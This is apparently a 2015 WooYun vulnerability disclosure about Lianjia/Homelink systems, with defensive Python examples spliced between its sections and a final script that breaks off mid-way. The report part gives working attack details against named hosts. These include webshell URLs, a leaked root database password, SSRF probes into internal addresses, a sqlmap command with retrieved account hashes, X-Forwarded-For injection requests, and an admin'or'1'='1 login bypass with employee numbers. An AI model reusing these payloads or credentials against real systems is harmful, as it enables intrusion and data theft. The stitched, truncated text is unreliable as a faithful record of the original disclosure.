
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0153103

Title: Lianjia (Homelink) real-estate company vulnerability collection (command execution / SSRF / SQL injection / logic flaws, etc.)

Vendor: homelink.com.cn

Author: _Thorns

Submitted: 2015-11-09 18:24

Fixed: 2015-12-24 18:56

Published: 2015-12-24 18:56

Vulnerability type: command execution

Severity: high

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-09: Details sent to the vendor; awaiting vendor action
2015-11-09: Vendor confirmed; details disclosed to the vendor only
2015-11-19: Details disclosed to core white hats and relevant domain experts
2015-11-29: Details disclosed to regular white hats
2015-12-09: Details disclosed to intern white hats
2015-12-24: Details disclosed to the public

Brief description:

Lianjia real-estate company vulnerability collection (part 2)

Detailed description:

1. Command execution in the Lianjia recruitment system
http://www.homelinkhr.com/view_initIndexPageForCustomer.action
http://www.homelinkhr.com/one8.jsp
http://www.homelinkhr.com/cmd.jsp

1.png


2.png


<property name="hibernate.connection.url">jdbc:mysql://127.0.0.1/homelink?useUnicode=true&amp;characterEncoding=utf8</property>
<property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property>
<property name="hibernate.connection.username">root</property>
<property name="hibernate.connection.password">homelink</property>


backuser@172.16.3.111::hrzhaopinDB
172.16.3.55 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDenANUQXTI9NHoWt5MTz6W2mflfX9v9jaKp5Bf36gLtCxDXTw48JDiYOGyXEKqrFsm6sdMyOZJnZTV51s5wSMiCJ+mD/aGAMOelptTyrhgM8CKGcMC7joUnt+Ytgh8qaiTOVL25SodIJTcte67m2AzrobmijEjQeG4v/y54c8AY9JSYpMxl78+dm1rUBXDAXrIq+O1Xa1huH1Fzrff32O3BN447U+CnSoNcP/+zltU5Ipx1djiBr76dyaG98hlxhqByDrvOJgtwrbtKDRc9HS3eHwH/cvgbKpRHLRUZiapX+z6IOnH89MGnVSAQKl3ZgNrhzvQlSVC769cy7sm/xU7
10.20.6.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwnjauhVy/wnS7lMbk8KAnSkQxm1x+7LrdfSUFGvcn6b6jwfp0OX89lQFGZ9GjJiU7gQ/Y6gcEKyYzx5n7xburk63b/er8D8Re7Y9p9HV+MYGAC0Gv8gY0zbcyDLFRlsJLWxgIhRvtY716cyrtO5oGDv4YpKhRPNKTUntrzcY899HhVe8QY2sBIbhyq4iygzk57C73gMj+/WZ2Xxz9soxfZE2a7wIBkSZ40KRxNTfnLGi4ysixXHYm7tSxUlhWPVvlLNWZX7EPOxLePvSyeyu0fGk5Egva/qTE+Ikvqt3njiRdN6MUcyr+7ymWDtJnfb6hL06B+rwvSEZSBVixhoJ5w==
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdVKLF5zuSvw95yYgrn9ry0C1iDVrAJnmYFO9azkWQdRNwJS/XBn4HJBFDru2WMDQAxbwKPhBfrb+mTv6yPylhPqv3nAZmsdnqrwsAG1SQmDdiJi9jcX8fqfBzmrF/Rtf/T8dYDG6DyP8txn4eqKhkIHUG07cZGJJTO536SzEH4KE6hpWolW78l1s3QnkZsXWH8JDssXcYGjAnYOLyN3hevmXNsKWJk4NIRCUL6jxo+Ybwr10kzozC0k7RvkNbEwFLGIvwY0chRAqVr6BsH0iiIrVIZGlJNfM46gX2W4b6RTAXFS4WV5ZzMqo7BHRFDUXRx51+sQrSt1/X0ObmTXCR wangam_v@homelink.com.cn


A whole pile of these had been planted on the box.

4.png


3.png


http://www.homelinkhr.com/nei.jsp?http://10.20.6.4:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.5:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.6:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.11:80


I only had a quick look and did not check the other subnets; it just needs fixing.

5.png
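The nei.jsp endpoint above takes a URL and fetches it server-side, which is how it reached the 10.20.6.x hosts. As an added example (not code from the report or from Lianjia's application), here is the check a fetch proxy should run before connecting: resolve the host first, then refuse anything that lands in a private, loopback, link-local, multicast or reserved range. The resolver is an injectable callable so the check can be exercised offline; the URLs in the usage note are constructed.

```python
"""Outbound-fetch target validation for a "fetch this URL" endpoint.

Added example, not the recruitment system's code. Hostnames are resolved
before the range check so that a DNS name pointing at an internal address
is rejected as well as a literal 10.x address. `resolver` is a hypothetical
hook (defaults to getaddrinfo) so the logic can run without network access.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _default_resolver(host):
    """Resolve a hostname to every address it maps to (A and AAAA)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_internal(ip):
    """True for any address a public fetch proxy should never connect to."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_fetch_target(url, resolver=_default_resolver):
    """Return (allowed, reason).

    Rejects non-http(s) schemes, credentials embedded in the URL, hosts that
    do not resolve, and any host that resolves to an internal address.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP: no DNS lookup
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return False, "unresolvable host"
    for ip in addrs:
        if is_internal(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed targets: the first two mirror the report's internal probes.
    for target in ("http://10.20.6.4:80", "http://[::1]/", "http://example.com/"):
        print(target, check_fetch_target(target))
```

Checking every resolved address, not just the first, matters because a name can return one public and one internal record; a fetch library that retries on the second address would otherwise slip past a first-address-only check.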


——————————————————————————————————————————
2. SQL injection in the Lianjia recruitment platform
sqlmap -u "http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302"

6.png


[19:14:24] [INFO] retrieved: "root","*****19DAAC4D4D97FB5C51731117291FE0A4D139"
[19:14:25] [INFO] retrieved: "zabbix","*****4D7D88CD046ECA02A80393B7780A63E7E...
[19:14:25] [INFO] retrieved: "hruser","*****19DAAC4D4D97FB5C51731117291FE0A4D139
I have masked the password hashes.
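The sqlmap run above would have left a distinctive trail in the web server's access log, as would the header injections in the voting and training systems further down. As an added example (not code from the report or from Lianjia), the scanner below parses a combined-style access log that has been extended with the X-Forwarded-For value as a final quoted field (an assumed log format; the sample lines are constructed to mirror the report's requests) and flags requests that carry sqlmap's default User-Agent or SQL metacharacters in a query parameter or the forwarded-for header. It covers the header case as well as the query-string case the sqlmap command targets.

```python
"""Flagging SQL-injection probes in web access logs.

Added example, not the report's or Lianjia's code. Assumes a log format of
  client ident user [ts] "METHOD target HTTP/x" status bytes "referer" "ua" "xff"
where the last quoted field is the X-Forwarded-For header (or "-").
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)

# Markers commonly seen in injection probes. A lone single quote is kept as a
# marker deliberately: the report's own payloads were nothing more than
# 127.0.0.1' in a header. Expect some noise from names like O'Brien.
SQLI_MARKERS = re.compile(
    r"'|--|/\*|\bunion\b\s+(?:all\s+)?select\b|\bor\b\s*['\d]"
    r"|\bsleep\s*\(|\bwaitfor\s+delay\b",
    re.IGNORECASE,
)


def suspicious_value(value):
    """Return the marker matched in a value, or None.

    The value is percent-decoded once more before matching so that
    double-encoded payloads (%2527) are caught as well.
    """
    m = SQLI_MARKERS.search(unquote_plus(value))
    return m.group(0) if m else None


def analyse_line(line):
    """Parse one log line; return a record with the reasons it looks like a
    probe (empty list if clean), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    for key, val in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        hit = suspicious_value(val)
        if hit:
            reasons.append(f"query param {key!r} contains {hit!r}")
    if m["xff"] != "-":
        hit = suspicious_value(m["xff"])
        if hit:
            reasons.append(f"X-Forwarded-For contains {hit!r}")
    return {"client": m["client"], "target": m["target"], "reasons": reasons}


def scan(lines):
    """Return only the records that have at least one reason."""
    out = []
    for line in lines:
        rec = analyse_line(line.rstrip("\n"))
        if rec and rec["reasons"]:
            out.append(rec)
    return out


# Constructed sample lines modelled on the requests shown in the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Nov/2015:19:14:24 +0800] "GET /view_getDetailInfoForCustomer.action?type=DD080302%27%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"',
    '203.0.113.5 - - [09/Nov/2015:19:20:01 +0800] "GET /admin.php?type=modify&id=5 HTTP/1.1" 200 812 "http://homelinktc.sinaapp.com/admin.php?type=modify&id=3" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0" "127.0.0.1\'"',
    '198.51.100.7 - - [09/Nov/2015:19:21:30 +0800] "GET /admin.php?type=modify&id=3 HTTP/1.1" 200 812 "-" "Mozilla/5.0" "198.51.100.7"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["client"], rec["target"], "->", "; ".join(rec["reasons"]))
```

The header check is the part most detection rules miss: X-Forwarded-For is client-controlled text, and an application that writes it into SQL is injectable even when every query parameter is clean, so the log format has to capture it for this rule to see anything.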
——————————————————————————————————————
3. SQL injection plus weak password on a Lianjia voting site
http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
Weak password: admin

GET /admin.php?type=modify&id=5 HTTP/1.1
Host: homelinktc.sinaapp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
Cookie: saeut=171.217.194.217.1446810857432391; PHPSESSID=e9a956ed0ad36a4e78bef22de3791749
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive


1.png

2.png


——————————————————————————————————————
4. Logic flaw in Kaipiaoba (invoicing system)
http://kaipiaoba.homelink.com.cn/ri/system/logout.action
In the password recovery flow, the page returns the verification code directly in its own response.

3.png


4.png

5.png
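The flaw in the Kaipiaoba recovery flow is that the HTTP response hands the verification code to whoever requested the reset, so the code proves nothing. As an added example (not the application's code), the service below shows the shape a reset flow should have: the code is generated server-side, only a hash plus an expiry and attempt counter is stored, delivery goes through an out-of-band sender (a hypothetical callable, stubbed in the test), and the HTTP-facing response is the same opaque message whether or not the account exists. The account names and the sender are assumptions for illustration.

```python
"""Password-recovery verification codes that never leave the server.

Added example, not the Kaipiaoba application's code. `send_code` stands in
for the real SMS or e-mail channel; `clock` is injectable so expiry can be
exercised without waiting.
"""
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 600      # code is valid for ten minutes
MAX_ATTEMPTS = 5            # wrong guesses allowed per issued code


class ResetService:
    def __init__(self, known_accounts, send_code, clock=time.time):
        self.known = set(known_accounts)
        self.send_code = send_code          # out-of-band delivery (SMS / e-mail)
        self.clock = clock
        self.pending = {}                   # account -> [digest, expires_at, attempts]

    @staticmethod
    def _digest(account, code):
        # Bind the code to the account so a code issued for one account
        # cannot be replayed against another.
        return hashlib.sha256(f"{account}:{code}".encode()).hexdigest()

    def request_reset(self, account):
        """Start a reset. The returned response never contains the code and
        does not reveal whether the account exists."""
        if account in self.known:
            code = f"{secrets.randbelow(10**6):06d}"   # 6-digit, CSPRNG-backed
            self.pending[account] = [self._digest(account, code),
                                     self.clock() + CODE_TTL_SECONDS, 0]
            self.send_code(account, code)
        return {"status": "if the account exists, a code has been sent"}

    def verify(self, account, code):
        """Check a submitted code: single-use, time-limited, attempt-limited."""
        entry = self.pending.get(account)
        if entry is None:
            return False
        digest, expires_at, attempts = entry
        if self.clock() > expires_at or attempts >= MAX_ATTEMPTS:
            self.pending.pop(account, None)     # burn the code, force a new request
            return False
        entry[2] += 1
        if hmac.compare_digest(digest, self._digest(account, code)):
            self.pending.pop(account, None)     # code is single-use
            return True
        return False


if __name__ == "__main__":
    delivered = {}
    svc = ResetService(["demo-account"], lambda acct, c: delivered.__setitem__(acct, c))
    print(svc.request_reset("demo-account"))      # no code in this output
    print(svc.verify("demo-account", "000000"))   # almost certainly False
    print(svc.verify("demo-account", delivered["demo-account"]))  # True
```

The attempt counter is what makes a six-digit code acceptable: without it, a client can simply iterate the million possibilities against the verify endpoint, which is a slower version of the same flaw the report describes.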


——————————————————————————————————
5. SQL injection in the training system: one oversight in an otherwise careful setup.

>>  With an employee system number you can get straight into the system.
20003441
10077125
10094796
20078458
20077533
20077532
20078346
20079701
10099533
20074589
20028476
Password: admin'or'1'='1


2.png


Injection

GET /Superagent/Reports02.aspx?UniqNo=370 HTTP/1.1
Host: tc.homelink.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=neea03pfbrjwag2sgmjuakgw
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive


3.png


http://tc.homelink.com.cn/Shopmall/PurchaseItems01.aspx

1.png


The database privileges are SA and the web path is known too, so writing a shell should not be hard; see:
WooYun: A weak password on a Lianjia site led to a simple intranet roam (fix incomplete)
WooYun: Incompletely fixed SQL injection in a Lianjia system led to another Getshell

Database: TrainingCenter
[310 tables]
+--------------------------------------------------+
| dbo.AcademyCertificateCourse |
| dbo.AcademyCertificateCourseProfile |
| dbo.AcademyCertificateCourseQual |
| dbo.AcademyCertificateCourseReg |
| dbo.AcademyClass |
| dbo.AcademyClassCourse |
| dbo.AcademyClassRoom |
| dbo.AcademyClassRoomUsage |
| dbo.AcademyCourse |
| dbo.AcademyCourseGroupDetail |
| dbo.AcademyCourseGroupHeader |
| dbo.AcademyCourseProfile |
| dbo.AcademyCourseQual |
| dbo.AcademyCourseVideo |
| dbo.AcademyDormitory |
| dbo.AcademyDormitoryUsage |
| dbo.AcademyEchelon |
| dbo.AcademyEchelonCourse |
| dbo.AcademyMatrix |
| dbo.AcademyMatrixZone |
| dbo.AcademyStudent |
| dbo.AcademyStudentCourseMark |
| dbo.AcademyStudentSatisfaction |
| dbo.AcademyStudentSatisfactionS |
| dbo.AcademySupervisor |
| dbo.AcademyTeacher |
| dbo.AcademyTeacherLog |
| dbo.Branch |
| dbo.City |
| dbo.Comments |
| dbo.Division |
| dbo.EmpCertificateCourseMark |
| dbo.ErrorData |
| dbo.EruditeAuditor |
| dbo.EruditeDateInfo |
| dbo.EruditeExamRoom |
| dbo.EruditeInvigilator |
| dbo.GeneralParms02 |
| dbo.Invoice |
| dbo.InvoiceMembers |
| dbo.News |
| dbo.NewsLike |
| dbo.NewsPhoto |
| dbo.Orders |
| dbo.ProductCourse |
| dbo.ProductPrice |
| dbo.Products |
| dbo.ProgramLog |
| dbo.ReaderCourse |
| dbo.SABranch |
| dbo.SecPrograms |
| dbo.SecRoleProgPrivilege |
| dbo.SecRoles |
| dbo.SecSubSystems |
| dbo.SecSystems |
| dbo.SecUserProgPrivilege |
| dbo.SecUserRole |
| dbo.SecUsers |
| dbo.SuperAgent |
| dbo.SuperAgentCandidate |
| dbo.SuperAgentScore |
| dbo.SystemParms02 |
| dbo.SystemValues |
| dbo.TC_Agent |
| dbo.TC_AgentCategory |
| dbo.TC_AgentStatus |
| dbo.TC_Area |
| dbo.TC_AreaQuizMark |
| dbo.TC_Branch |
| dbo.TC_City |
| dbo.TC_Division |
| dbo.TC_EmpQuizMark |
| dbo.TC_Employee |
| dbo.TC_EmployeeIDTemp |
| dbo.TC_EmployeeObj |
| dbo.TC_EmployeeTemp |
| dbo.TC_QuizStatus |
| dbo.TC_Teacher |
| dbo.TC_Team |
| dbo.TC_Zone |
| dbo.TMPDataCheckLog |
| dbo.UP_Agent |
| dbo.ViewAcademyCertificateCourse01 |
| dbo.ViewAcademyCertificateCourse02 |
| dbo.ViewAcademyCertificateCourseProfile01 |
| dbo.ViewAcademyCertificateCourseQual01 |
| dbo.ViewAcademyCertificateCourseReg01 |
| dbo.ViewAcademyCertificateCourseReg02 |
| dbo.ViewAcademyClass01 |
| dbo.ViewAcademyClassCourse01 |
| dbo.ViewAcademyClassCourseStudentMark01 |
| dbo.ViewAcademyClassCourseStudentMark02 |
| dbo.ViewAcademyClassRoom01 |
| dbo.ViewAcademyClassRoomNoOfStudent01 |
| dbo.ViewAcademyClassRoomNoOfStudent02 |
| dbo.ViewAcademyClassRoomUsage01 |
| dbo.ViewAcademyCourse01 |
| dbo.ViewAcademyCourseGroupDetail01 |
| dbo.ViewAcademyCourseProfile01 |
| dbo.ViewAcademyCourseQual01 |
| dbo.ViewAcademyCourseVideo01 |
| dbo.ViewAcademyDormitory01 |
| dbo.ViewAcademyDormitoryNoOfStudent01 |
| dbo.ViewAcademyDormitoryUsage01 |
| dbo.ViewAcademyEchelon01 |
| dbo.ViewAcademyEchelonClass01 |
| dbo.ViewAcademyEchelonCourse01 |
| dbo.ViewAcademyEchelonCourseByCategory01 |
| dbo.ViewAcademyEchelonNoOfStudent01 |
| dbo.ViewAcademyEchelonTerms01 |
| dbo.ViewAcademyMatrixZone01 |
| dbo.ViewAcademyStudent01 |
| dbo.ViewAcademyStudentByAreas00 |
| dbo.ViewAcademyStudentByAreas01 |
| dbo.ViewAcademyStudentByAreas02 |
| dbo.ViewAcademyStudentByAreas03 |
| dbo.ViewAcademyStudentByAreas04 |
| dbo.ViewAcademyStudentByAreas05 |
| dbo.ViewAcademyStudentByAreas06 |
| dbo.ViewAcademyStudentByBranchs00 |
| dbo.ViewAcademyStudentByBranchs01 |
| dbo.ViewAcademyStudentByBranchs02 |
| dbo.ViewAcademyStudentByBranchs03 |
| dbo.ViewAcademyStudentByBranchs04 |
| dbo.ViewAcademyStudentByBranchs05 |
| dbo.ViewAcademyStudentByBranchs06 |
| dbo.ViewAcademyStudentByTeams00 |
| dbo.ViewAcademyStudentByTeams01 |
| dbo.ViewAcademyStudentByTeams02 |
| dbo.ViewAcademyStudentByTeams03 |
| dbo.ViewAcademyStudentByTeams04 |
| dbo.ViewAcademyStudentByTeams05 |
| dbo.ViewAcademyStudentByTeams06 |
| dbo.ViewAcademyStudentByZones00 |
| dbo.ViewAcademyStudentByZones01 |
| dbo.ViewAcademyStudentByZones02 |
| dbo.ViewAcademyStudentByZones03 |
| dbo.ViewAcademyStudentByZones04 |
| dbo.ViewAcademyStudentByZones05 |
| dbo.ViewAcademyStudentByZones06 |
| dbo.ViewAcademyStudentCourseMark01 |
| dbo.ViewAcademyStudentCourseMark02 |
| dbo.ViewAcademyStudentCourseMark03 |
| dbo.ViewAcademyStudentCourseMark04 |
| dbo.ViewAcademyStudentCourseMark11 |
| dbo.ViewAcademyStudentCourseMark12 |
| dbo.ViewAcademyStudentCourseMark13 |
| dbo.ViewAcademyStudentGroupByEmpCategory01 |
| dbo.ViewAcademyStudentGroupByEmpCategoryGender01 |
| dbo.ViewAcademyStudentGroupByGender01 |
| dbo.ViewAcademyStudentGroupByZone01 |
| dbo.ViewAcademyStudentNoOfClassRoom01 |
| dbo.ViewAcademyStudentNoOfClassRoom02 |
| dbo.ViewAcademyStudentNoOfClassRoom03 |
| dbo.ViewAcademyStudentNoOfClassRoom04 |
| dbo.ViewAcademyStudentNoOfDormitory01 |
| dbo.ViewAcademyStudentNoOfEMPTMStatus01 |
| dbo.ViewAcademyStudentNoOfMatrix01 |
| dbo.ViewAcademyStudentSatisfaction01 |
| dbo.ViewAcademyStudentSatisfaction02 |
| dbo.ViewAcademyStudentSatisfactionAVG01 |
| dbo.ViewAcademyStudentSatisfactionQ00 |
| dbo.ViewAcademyStudentSatisfactionQ01 |
| dbo.ViewAcademyStudentSatisfactionQ02 |
| dbo.ViewAcademyStudentSatisfactionQ03 |
| dbo.ViewAcademyStudentSatisfactionQ04 |
| dbo.ViewAcademyStudentSatisfactionQ05 |
| dbo.ViewAcademyStudentSatisfactionQ06 |
| dbo.ViewAcademyStudentSatisfactionQ07 |
| dbo.ViewAcademyStudentSatisfactionQ08 |
| dbo.ViewAcademyStudentSatisfactionQ09 |
| dbo.ViewAcademyStudentSatisfactionQ10 |
| dbo.ViewAcademyStudentSatisfactionQ11 |
| dbo.ViewAcademyStudentSatisfactionQ12 |
| dbo.ViewAcademyStudentSatisfactionQ13 |
| dbo.ViewAcademyStudentSatisfactionQ14 |
| dbo.ViewAcademyStudentSatisfactionQ15 |
| dbo.ViewAcademyStudentSatisfactionQ16 |
| dbo.ViewAcademyStudentSatisfactionQ17 |
| dbo.ViewAcademyStudentSatisfactionQ18 |
| dbo.ViewAcademyStudentSatisfactionQ19 |
| dbo.ViewAcademyStudentSatisfactionQ20 |
| dbo.ViewAcademyTeacher01 |
| dbo.ViewAcademyTeacherPoint01 |
| dbo.ViewBranch01 |
| dbo.ViewComments01 |
| dbo.ViewComments02 |
| dbo.ViewDivision01 |
| dbo.ViewEmpCertificateCourseMark01 |
| dbo.ViewEruditeAuditor01 |
| dbo.ViewEruditeDateDistinct01 |
| dbo.ViewEruditeDateInfo01 |
| dbo.ViewEruditeExamRoom01 |
| dbo.ViewEruditeExamRoomAuditor01 |
| dbo.ViewEruditeExamRoomEmpEnroll |
| dbo.ViewEruditeInvigilator01 |
| dbo.ViewEruditeMark01 |
| dbo.ViewInvoice01 |
| dbo.ViewInvoiceMembers01 |
| dbo.ViewNews01 |
| dbo.ViewNewsLike01 |
| dbo.ViewProductCourse01 |
| dbo.ViewProducts01 |
| dbo.ViewReaderCourse01 |
| dbo.ViewSABranch01 |
| dbo.ViewSABranch02 |
| dbo.ViewSecPrograms01 |
| dbo.ViewSecRoleProgPrivilege01 |
| dbo.ViewSecRoleProgPrivilege02 |
| dbo.ViewSecSubSystems01 |
| dbo.ViewSecSystems01 |
| dbo.ViewSecUserProgPrivilege01 |
| dbo.ViewSecUserProgPrivilegeByDistSystemCode |
| dbo.ViewSecUserRole01 |
| dbo.ViewSecUsers01 |
| dbo.ViewSuperAgent01 |
| dbo.ViewSuperAgentCandidate01 |
| dbo.ViewSuperAgentScore01 |
| dbo.ViewTCAgent01 |
| dbo.ViewTCAgentByAreaAgentTotal01 |
| dbo.ViewTCAgentByBranchAgentTotal01 |
| dbo.ViewTCAgentByCityAgentTotal01 |
| dbo.ViewTCAgentByDivisionAgentTotal01 |
| dbo.ViewTCAgentByTeamAgentTotal01 |
| dbo.ViewTCAgentByZoneAgentTotal01 |
| dbo.ViewTCArea01 |
| dbo.ViewTCBranch01 |
| dbo.ViewTCCity01 |
| dbo.ViewTCDivision01 |
| dbo.ViewTCEmpQuizMark01 |
| dbo.ViewTCEmpQuizMarkByAreaAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaQuiz01 |
| dbo.ViewTCEmpQuizMarkByAreaQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchQuiz01 |
| dbo.ViewTCEmpQuizMarkByBranchQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByCityAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByCityAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByCityQuiz01 |
| dbo.ViewTCEmpQuizMarkByCityQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByCityRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByCityUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionQuiz01 |
| dbo.ViewTCEmpQuizMarkByDivisionQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamQuiz01 |
| dbo.ViewTCEmpQuizMarkByTeamQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneQuiz01 |
| dbo.ViewTCEmpQuizMarkByZoneQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneUnQuizTotal01 |
| dbo.ViewTCEmployee01 |
| dbo.ViewTCEmployeeTempNoOfRecords01 |
| dbo.ViewTCQuizDateDistinct01 |
| dbo.ViewTCTeam01 |
| dbo.ViewTCZone01 |
| dbo.ViewTeacherPrestudyLog01 |
| dbo.ViewZTCenterArea01 |
| dbo.ViewZTCenterRoom01 |
| dbo.ViewZTClass01 |
| dbo.ViewZTClass02 |
| dbo.ViewZTClassRoom01 |
| dbo.ViewZTStudent01 |
| dbo.ViewZTStudent01SumByArea |
| dbo.ViewZTStudent01SumByAreaAbsent |
| dbo.ViewZTStudent01SumByAreaAttend |
| dbo.ViewZTStudent01SumByAreaLate |
| dbo.ViewZTStudent01SumByAreaLeave |
| dbo.ViewZTStudent01SumByAreaMark100 |
| dbo.ViewZTStudent01SumByAreaPass |
| dbo.ViewZTStudent01SumByAreaTotal |
| dbo.ViewZTStudent01SumByClassAbsent |
| dbo.ViewZTStudent01SumByClassAttend |
| dbo.ViewZTStudent01SumByClassLate |
| dbo.ViewZTStudent01SumByClassLeave |
| dbo.ViewZTStudent01SumByClassMark100 |
| dbo.ViewZTStudent01SumByClassPass |
| dbo.ViewZTStudent01SumByClassTotal |
| dbo.ViewZTStudentCourse01 |
| dbo.ViewZTStudentCourseMark01 |
| dbo.ViewZTStudentCourseMark02 |
| dbo.ViewZTStudentCourseMark03 |
| dbo.ViewZone01 |
| dbo.ZTCenter |
| dbo.ZTCenterArea |
| dbo.ZTCenterRoom |
| dbo.ZTClass |
| dbo.ZTClassRoom |
| dbo.ZTStudent |
| dbo.ZTStudentCourse |
| dbo.ZTStudentCourseMark |
| dbo.ZTStudentCourseMarkTemp |
| dbo.Zone |
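The training-system login that accepts admin'or'1'='1 as a password (item 5) and the voting-site admin page that breaks on an X-Forwarded-For header of 127.0.0.1' (item 3) are the same defect: client-controlled text spliced into a SQL statement. As an added example (not code from either Lianjia system), the snippet below builds a constructed in-memory SQLite schema and runs both operations first with string formatting and then with bound parameters, so the difference in behaviour is observable rather than asserted. The table and column names are assumptions chosen to echo the report's SecUsers table; the data is made up.

```python
"""String-built SQL beside parameterised SQL for the two patterns in the report.

Added example, not Lianjia's code. SQLite is used only because it ships with
Python; the vulnerable/fixed contrast is identical on MySQL or SQL Server.
"""
import sqlite3


def make_db():
    """Constructed schema: one user row and an empty visit log."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE SecUsers (EmpNo TEXT, Password TEXT)")
    db.execute("INSERT INTO SecUsers VALUES ('20003441', 'correct horse')")
    db.execute("CREATE TABLE VisitLog (Ip TEXT, Page TEXT)")
    return db


def login_vulnerable(db, empno, password):
    """String-built query: the password value can rewrite the WHERE clause.
    With password admin'or'1'='1 the clause becomes
    (EmpNo='...' AND Password='admin') OR '1'='1', which is always true."""
    sql = (f"SELECT COUNT(*) FROM SecUsers WHERE EmpNo='{empno}' "
           f"AND Password='{password}'")
    return db.execute(sql).fetchone()[0] > 0


def login_fixed(db, empno, password):
    """Bound parameters: the values are data and can never become SQL."""
    row = db.execute(
        "SELECT COUNT(*) FROM SecUsers WHERE EmpNo=? AND Password=?",
        (empno, password)).fetchone()
    return row[0] > 0


def log_visit_vulnerable(db, xff, page):
    """Writes the X-Forwarded-For header into SQL by concatenation. A single
    quote in the header breaks the statement, which is exactly the error the
    report's 127.0.0.1' probe triggered."""
    db.execute(f"INSERT INTO VisitLog VALUES ('{xff}', '{page}')")


def log_visit_fixed(db, xff, page):
    """Same insert with bound parameters; the quote is stored literally."""
    db.execute("INSERT INTO VisitLog VALUES (?, ?)", (xff, page))


def insert_succeeds(logger, db, xff):
    """Run one of the loggers and report whether the statement executed."""
    try:
        logger(db, xff, "/admin.php")
        return True
    except sqlite3.Error:
        return False


if __name__ == "__main__":
    db = make_db()
    bypass = "admin'or'1'='1"
    print("vulnerable login accepts bypass:", login_vulnerable(db, "20003441", bypass))
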